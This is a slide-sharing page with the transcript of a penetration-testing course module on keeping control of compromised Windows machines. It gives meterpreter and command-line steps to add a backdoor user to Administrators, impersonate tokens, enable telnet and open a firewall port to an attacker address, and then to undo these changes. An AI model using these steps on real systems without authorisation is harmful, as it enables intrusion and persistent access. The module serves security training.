Presentation is loading. Please wait.

Presentation is loading. Please wait.

Module 36 (Expanding Your Control of Windows Victims)

Published byDella O’Connor’ Modified over 6 years ago

Similar presentations

Presentation on theme: "Module 36 (Expanding Your Control of Windows Victims)"— Presentation transcript:

1 Module 36 (Expanding Your Control of Windows Victims)
At the end of this Module, you'll know how to add, delete, activate, and inactivate windows users from the command line. You'll know how to create local groups and add and remove users from them. You'll also know how to start, configure, and stop services and how to open and close firewall port connections for them. Module 36

2 Make Victims Work For You
Once you've compromised a victim, you should make it work for you. If the machine is easily accessible to you that's good. You may want to create or manipulate users and local groups. Well-configured victim machines will be running few services. You need to get them to start services up for you to ease your task. Module 36

3 Users are Good. Add Them In a meterpreter session, you can execute the command shell to interact with the Windows command prompt See what users exist: net user Use the net command to add users: net user [username] [password] /add net user hax0r /add Make an inactive user active net user guest /active:yes or inactive net user Administrator /active no ?!?!?! Module 36

4 Groups are Good Use Them
See what local groups are available net LocalGroup (If this fails to work, see the next page.) The TelnetClients group tells who can use telnet net LocalGroup TelnetClients /add net LocalGroup TelnetClients hax0r /add Other groups can be important too net LocalGroup Administrators hax0r /add Module 36

5 If net localgroup Doesn't Work...
Your meterpreter may be running as NT AUTHORITY\SYSTEM. Check by executing getuid If running net localgroup yields a 1312 error do this in the meterpreter use incognito impersonate_token “NT AUTHORITY\\NETWORK SERVICE” Then run a shell and net localgroup should work for you. Module 36

6 Services that Might Be Useful
Telnet SSH VNC Remote Desktop Module 36

7 How Do You Start/Stop a Service?
For greatest control, use sc.exe (Service Control?) Support comprehensive control of services Start Stop Query Configure Module 36

8 How to Enable Telnet Service
See if its already running sc query tlntsvr Configure telnet to start on demand sc config tlntsvr start= demand Start the service up! sc start tlntsvr Open a firewall connection netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = [AttackerIPAddress] Module 36

9 When You Are Through, Clean Up!
Any changes you make to a system break the security model of your client. This may introduce vulnerabilities that can be exploited by other attackers. Before completing your penetration test: If you start any services, stop them If you open any firewall ports, close them If you create any files, remove them. If you add any groups delete them If you add any users delete them Module 36

10 Clean Up For Our Example
sc tlntsvr stop netsh firewall delete portopening protocol = TCP port = net LocalGroup TelnetClients /del net user hax0r /del Module 36

Download ppt "Module 36 (Expanding Your Control of Windows Victims)"

Similar presentations

Litmus Learning Primer tests

Litmus Learning Primer tests
Chapter One The Essence of UNIX.

Chapter One The Essence of UNIX.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Chapter 9: Troubleshooting and Repairing Networking.

Chapter 9: Troubleshooting and Repairing Networking.
11 ADMINISTERING MICROSOFT WINDOWS SERVER 2003 Chapter 2.

11 ADMINISTERING MICROSOFT WINDOWS SERVER 2003 Chapter 2.
Microsoft Server 2008 R2 Group Policies & Network Policy and Access Services.

Microsoft Server 2008 R2 Group Policies & Network Policy and Access Services.
Remote Desktop Security Raghav Chawla, Jon Ussery Group 20.

Remote Desktop Security Raghav Chawla, Jon Ussery Group 20.
COEN 252: Computer Forensics Router Investigation.

COEN 252: Computer Forensics Router Investigation.
TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.

TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.
Printing Terminology. Requirements for Network Printing At least one computer to operate as the print server Sufficient RAM to process documents Sufficient.

Printing Terminology. Requirements for Network Printing At least one computer to operate as the print server Sufficient RAM to process documents Sufficient.
11 SYSTEMS ADMINISTRATION AND TERMINAL SERVICES Chapter 12.

11 SYSTEMS ADMINISTRATION AND TERMINAL SERVICES Chapter 12.
Remote access and file transfer Getting files on and off Bio-Linux.

Remote access and file transfer Getting files on and off Bio-Linux.
Telnet/SSH: Connecting to Hosts Internet Technology1.

Telnet/SSH: Connecting to Hosts Internet Technology1.
2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.

2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.
Course 201 – Administration, Content Inspection and SSL VPN

Course 201 – Administration, Content Inspection and SSL VPN
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
Cyber Patriot Training

Cyber Patriot Training
Hands-On Microsoft Windows Server 2008

Hands-On Microsoft Windows Server 2008
Penetration Testing Training Day Capture the Flag Training.

Penetration Testing Training Day Capture the Flag Training.
CSN08101 Digital Forensics Lecture 1B: Essential Linux and Caine Module Leader: Dr Gordon Russell Lecturers: Robert Ludwiniak.

CSN08101 Digital Forensics Lecture 1B: Essential Linux and Caine Module Leader: Dr Gordon Russell Lecturers: Robert Ludwiniak.

Similar presentations

Ads by Google